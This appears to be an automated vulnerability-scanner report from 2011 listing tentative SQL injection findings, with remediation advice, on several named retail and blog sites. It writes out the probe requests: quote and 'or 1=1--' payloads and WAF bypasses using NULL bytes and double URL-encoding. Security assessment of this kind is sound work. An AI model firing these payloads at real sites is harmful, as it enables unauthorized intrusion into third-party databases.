SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Remediation background
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The lpjson parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the lpjson parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The COBRANDID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the COBRANDID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /store/mfe/en_GB/buy'/productID.237091200 HTTP/1.1
Host: www.mcafeestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=21859056255,0)
Content-Length: 89067
Date: Fri, 30 Sep 2011 12:44:30 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app67
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... <!--!esi:include src="/store?Action=DisplayESIPage&Currency=AUD&ESIHC=4b937cbd&Env=BASE&Locale=en_AU&SiteID=mfe&StyleID=24160400&StyleVersion=38&ceid=176851100&cename=TopHeader&id=ServerErrorPage&productID=237091200"--> ...[SNIP]... <pre>com.digitalriver.exception.TrackedSystemException: PRC_000001 at com.digitalriver.catalog.rules.AddItemToRequisition.doWork(AddItemToRequisition.java:291) at com.digitalriver.rules.ActionRule.evaluate(ActionRule.java:41) at ...[SNIP]...
Request 2
GET /store/mfe/en_GB/buy''/productID.237091200 HTTP/1.1
Host: www.mcafeestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Moved Temporarily
Location: https://www.mcafeestore.com/store?''=&Action=buy&Env=BASE&Locale=en_GB&SiteID=mfe&productID=237091200
Content-Type: text/plain
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=107758402677,0)
Content-Length: 0
Date: Fri, 30 Sep 2011 12:44:31 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app67
Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /store/mfe/en_GB%2527/home HTTP/1.1
Host: www.mcafeestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=64808723200,0)
Content-Length: 24329
Date: Fri, 30 Sep 2011 12:44:24 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app62
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... <!--!esi:include src="/store?Action=DisplayESIPage&Currency=GBP&ESIHC=f7b63e21&Env=BASE&Locale=en_GB&SiteID=mfe&StyleID=24160400&StyleVersion=38&ceid=176851100&cename=TopHeader&id=ServerErrorPage"--> ...[SNIP]... <pre>com.digitalriver.exception.TrackedSystemException: SIT_000001 at com.digitalriver.system.controller.SiteflowPlugin.determineNextPage(SiteflowPlugin.java:389) at com.digitalriver.system.controller.SiteflowPlugin.handleRequest( ...[SNIP]...
Request 2
GET /store/mfe/en_GB%2527%2527/home HTTP/1.1
Host: www.mcafeestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Moved Temporarily
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, private
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Location: https://www.mcafeestore.com/store?%27%27=&Action=en_GB&Env=BASE&Locale=en_GB&SiteID=mfe&home=
Content-Type: text/plain
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=94873494588,0)
Content-Length: 0
Date: Fri, 30 Sep 2011 12:44:25 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app62
Connection: close
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /store/mfe/en_GB/pd/productID.208082000 HTTP/1.1
Host: www.mcafeestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00'
Response 1
HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=64808723128,0)
Content-Length: 32159
Date: Fri, 30 Sep 2011 12:44:24 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app62
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... <span class="dr_error" id="qty_error_span"> ...[SNIP]... .getElementById('quantity'); // Returns true when the quantity is a positive integer function validQty(qty) { return /^[1-9]\d*$/.test(qty); } // Switch the class when the quantity is invalid function setQtyFocus() { if (!validQty(qtyField.value)) { qtyField.className = ErrorFocusClassName; } } // Resets the quantity field class when the user tabs off the field
...[SNIP]...
Request 2
GET /store/mfe/en_GB/pd/productID.208082000 HTTP/1.1
Host: www.mcafeestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00''
Response 2
HTTP/1.1 302 Moved Temporarily
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, private
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Location: https://www.mcafeestore.com/store?Action=pd&Env=BASE&Locale=en_GB&SiteID=mfe&productID=208082000
Content-Type: text/plain
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=64808723471,0)
Content-Length: 0
Date: Fri, 30 Sep 2011 12:44:25 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app62
Connection: close
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /store/mfe/en_GB/pd/productID.237091200 HTTP/1.1
Host: www.mcafeestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00'
Response 1
HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=21859050158,0)
Content-Length: 31552
Date: Fri, 30 Sep 2011 12:44:24 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app62
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... <span class="dr_error" id="qty_error_span"> ...[SNIP]... .getElementById('quantity'); // Returns true when the quantity is a positive integer function validQty(qty) { return /^[1-9]\d*$/.test(qty); } // Switch the class when the quantity is invalid function setQtyFocus() { if (!validQty(qtyField.value)) { qtyField.className = ErrorFocusClassName; } } // Resets the quantity field class when the user tabs off the field
...[SNIP]...
Request 2
GET /store/mfe/en_GB/pd/productID.237091200 HTTP/1.1
Host: www.mcafeestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00''
Response 2
HTTP/1.1 302 Moved Temporarily
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, private
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Location: https://www.mcafeestore.com/store?Action=pd&Env=BASE&Locale=en_GB&SiteID=mfe&productID=237091200
Content-Type: text/plain
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=103463429157,0)
Content-Length: 0
Date: Fri, 30 Sep 2011 12:44:25 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app62
Connection: close
1.7. http://www.pcaholic.com/wp-content/plugins/contact-form-7/jquery.form.js [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://www.pcaholic.com
Path: /wp-content/plugins/contact-form-7/jquery.form.js
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 13737313%20or%201%3d1--%20 and 13737313%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /wp-content/plugins/contact-form-7/jquery.form.js?113737313%20or%201%3d1--%20=1 HTTP/1.1
Host: www.pcaholic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

GET /wp-content/plugins/contact-form-7/jquery.form.js?113737313%20or%201%3d2--%20=1 HTTP/1.1
Host: www.pcaholic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
/*! * jQuery Form Plugin * version: 2.83 (11-JUL-2011) * @requires jQuery v1.3.2 or later * * Examples and documentation at: http://malsup.com/jquery/form/ * Dual licensed under the MIT and GPL licenses: * http://www.opensource.org/licenses/mit-license.php * http://www.gnu.org/licenses/gpl.html */ ;(function($) {
/* Usage Note: ----------- Do not use both ajaxSubmit and ajaxForm on the same form. These functions are intended to be exclusive. Use ajaxSubmit if you want to bind your own submit handler to the form. For example,
When using ajaxForm, the ajaxSubmit function will be invoked for you at the appropriate time. */
/** * ajaxSubmit() provides a mechanism for immediately submitting * an HTML form using AJAX. */ $.fn.ajaxSubmit = function(options) { // fast fail if nothing selected (http://dev.jquery.com/ticket/2752) if (!this.length) { log('ajaxSubmit: skipping submit process - no element selected'); return this; }
1.8. http://www.pcaholic.com/wp-content/plugins/contact-form-7/scripts.js [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://www.pcaholic.com
Path: /wp-content/plugins/contact-form-7/scripts.js
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 10647341%20or%201%3d1--%20 and 10647341%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /wp-content/plugins/contact-form-7/scripts.js?110647341%20or%201%3d1--%20=1 HTTP/1.1
Host: www.pcaholic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

GET /wp-content/plugins/contact-form-7/scripts.js?110647341%20or%201%3d2--%20=1 HTTP/1.1
Host: www.pcaholic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
if (data.onSubmit) $.each(data.onSubmit, function(i, n) { eval(n) });
$(data.into).find('.wpcf7-use ...[SNIP]...
1.9. http://www.pcaholic.com/wp-content/plugins/contact-form-7/styles.css [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://www.pcaholic.com
Path: /wp-content/plugins/contact-form-7/styles.css
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 33260542%20or%201%3d1--%20 and 33260542%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /wp-content/plugins/contact-form-7/styles.css?133260542%20or%201%3d1--%20=1 HTTP/1.1
Host: www.pcaholic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

GET /wp-content/plugins/contact-form-7/styles.css?133260542%20or%201%3d2--%20=1 HTTP/1.1
Host: www.pcaholic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.10. http://www.pcaholic.com/wp-content/plugins/sociable/addtofavorites.js [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://www.pcaholic.com
Path: /wp-content/plugins/sociable/addtofavorites.js
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 89917484%20or%201%3d1--%20 and 89917484%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /wp-content/plugins/sociable/addtofavorites.js?189917484%20or%201%3d1--%20=1 HTTP/1.1
Host: www.pcaholic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

GET /wp-content/plugins/sociable/addtofavorites.js?189917484%20or%201%3d2--%20=1 HTTP/1.1
Host: www.pcaholic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
function AddToFavorites() { var title = document.title; var url = location.href; if (window.sidebar) // Firefox window.sidebar.addPanel(title, url, ''); else if(window.opera && window.print) // Opera { var elem = document.createElement('a'); elem.setAttribute('href',url); elem.setAttribute('title',title); elem.setAttribute('rel','sidebar'); // required to work in opera 7+ elem.click(); } else if(document.all) // IE window.external.AddFavorite(url, title); }
1.11. http://www.pcaholic.com/wp-content/plugins/sociable/sociable.css [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://www.pcaholic.com
Path: /wp-content/plugins/sociable/sociable.css
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 14496072%20or%201%3d1--%20 and 14496072%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /wp-content/plugins/sociable/sociable.css?114496072%20or%201%3d1--%20=1 HTTP/1.1
Host: www.pcaholic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

GET /wp-content/plugins/sociable/sociable.css?114496072%20or%201%3d2--%20=1 HTTP/1.1
Host: www.pcaholic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.12. http://www.pcaholic.com/wp-includes/js/jquery/jquery.js [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://www.pcaholic.com
Path: /wp-includes/js/jquery/jquery.js
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 88865280%20or%201%3d1--%20 and 88865280%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /wp-includes/js/jquery/jquery.js?188865280%20or%201%3d1--%20=1 HTTP/1.1
Host: www.pcaholic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

GET /wp-includes/js/jquery/jquery.js?188865280%20or%201%3d2--%20=1 HTTP/1.1
Host: www.pcaholic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
/*! * jQuery JavaScript Library v1.6.1 * http://jquery.com/ * * Copyright 2011, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Includes Sizzle.js * http://sizzlejs.com/ * Copyright 2011, The Dojo Foundation * Released under the MIT, BSD, and GPL Licenses. * * Date: Thu May 12 15:04:36 2011 -0400 */ ...[SNIP]...
1.13. http://www.pcaholic.com/wp-includes/js/l10n.js [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://www.pcaholic.com
Path: /wp-includes/js/l10n.js
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 17799343%20or%201%3d1--%20 and 17799343%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /wp-includes/js/l10n.js?117799343%20or%201%3d1--%20=1 HTTP/1.1
Host: www.pcaholic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

GET /wp-includes/js/l10n.js?117799343%20or%201%3d2--%20=1 HTTP/1.1
Host: www.pcaholic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
function convertEntities(b){var d,a;d=function(c){if(/&[^;]+;/.test(c)){var f=document.createElement("div");f.innerHTML=c;return !f.firstChild?c:f.firstChild.nodeValue}return c};if(typeof b==="string"){return d(b)}else{if(typeof b==="object"){for(a in b){if(typeof b[a]==="string"){b[a]=d(b[a])}}}}return b};
1.14. http://www.pcaholic.com/xmlrpc.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://www.pcaholic.com
Path: /xmlrpc.php
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 15000864%20or%201%3d1--%20 and 15000864%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /xmlrpc.php?115000864%20or%201%3d1--%20=1 HTTP/1.1
Host: www.pcaholic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

GET /xmlrpc.php?115000864%20or%201%3d2--%20=1 HTTP/1.1
Host: www.pcaholic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /sycro/comm/stats.asp HTTP/1.1
Host: www.sycro.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='
Response 1
HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Fri, 30 Sep 2011 12:32:54 GMT
X-Powered-By: ASP.NET
Connection: close
Location: /sycro/order/basket.asp?mode=error500
Content-Length: 158
Content-Type: text/html
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/sycro/order/basket.asp?mode=error500">here</a>.</body>
Request 2
GET /sycro/comm/stats.asp HTTP/1.1
Host: www.sycro.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=''
Response 2
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 30 Sep 2011 12:32:55 GMT
X-Powered-By: ASP.NET
Connection: close
Content-Length: 21
Content-Type: application/x-javascript
Cache-control: private
The EdpNo parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the EdpNo parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
The PG parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the PG parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the PG request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /secure/orderlogin.asp?PG=1%2527 HTTP/1.1 Host: www.tigerdirect.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Request 2
GET /secure/orderlogin.asp?PG=1%2527%2527 HTTP/1.1 Host: www.tigerdirect.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /secure/orderlogin.asp HTTP/1.1 Host: www.tigerdirect.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=%00'
Request 2
GET /secure/orderlogin.asp HTTP/1.1 Host: www.tigerdirect.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=%00''
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /secure/orderlogin.asp HTTP/1.1 Host: www.tigerdirect.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00' Connection: close
Request 2
GET /secure/orderlogin.asp HTTP/1.1 Host: www.tigerdirect.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00'' Connection: close
<html> <head> <title>Order Login</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <meta name="description" content="TigerDirect.com is your complete o ...[SNIP]...
1.20. https://www.tigerdirect.ca/secure/orderlogin.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
